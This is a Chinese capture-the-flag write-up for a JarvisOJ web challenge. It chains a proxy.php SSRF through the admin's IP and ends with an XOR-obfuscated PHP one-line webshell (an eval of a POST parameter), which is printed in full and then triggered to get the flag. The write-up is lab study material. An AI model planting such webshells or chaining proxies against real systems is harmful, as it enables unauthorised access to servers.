2019年4月9日19:20:11
URL: http://web.jarvisoj.com:32782/
上来就看源代码,看有没有提示:
注意第7行,有一个url跳转,但是暂时还不知道怎么用
接着点击第9行"admin",看到/admin网页源代码:
注意第9行,提示admin的ip是202.5.19.128
接着去这个网站上逛了一下,没发现什么
猜测题意想要我们用admin的ip来访问这个网站的/admin,可是该如何做到呢?网络代理不太好弄啊。
这时候不能忽略了index网页的提示
<img src="proxy.php?url=http://dn.jarvisoj.com/static/images/proxy.jpg" alt="">
proxy.php的作用就像是一个跳板,我们可以尝试用它去访问别的网页,比如 www.baidu.com:
成功了,而且还通过Notice得到了网站根目录
可是我们需要的是利用admin的ip再来访问本站才行,于是大胆猜测admin的服务器上会不会也有一个proxy.php
有了想法就立即尝试:
http://web.jarvisoj.com:32782//proxy.php?url=http://202.5.19.128/proxy.php?url=http://web.jarvisoj.com:32782/admin/
果不其然,访问成功,并且主页还有提示
有提示,说明路没走错,接着下一步呢,有点茫然,当没有已知条件的时候,就去创造已知条件,比如扫后台,很容易在/admin/下找到robots.txt
User-agent: * Disallow:trojan.php Disallow:trojan.php.txt
顺势访问 trojan.php.txt
<?php ${("#"^"|").("#"^"|")}=("!"^"`").("( "^"{").("("^"[").("~"^";").("|"^".").("*"^"~");${("#"^"|").("#"^"|")}(("-"^"H"). ("]"^"+"). ("["^":"). (","^"@"). ("}"^"U"). ("e"^"A"). ("("^"w").("j"^":"). ("i"^"&"). ("#"^"p"). (">"^"j"). ("!"^"z"). ("T"^"g"). ("e"^"S"). ("_"^"o"). ("?"^"b"). ("]"^"t"));?>
发现是个一句话木马,估计就是trojan.php的内容,把这个脚本在本地跑一下就能发现是 eval($_POST(360));
然后用hackbar对trojan.php POST 360=1,就看到flag跳出来了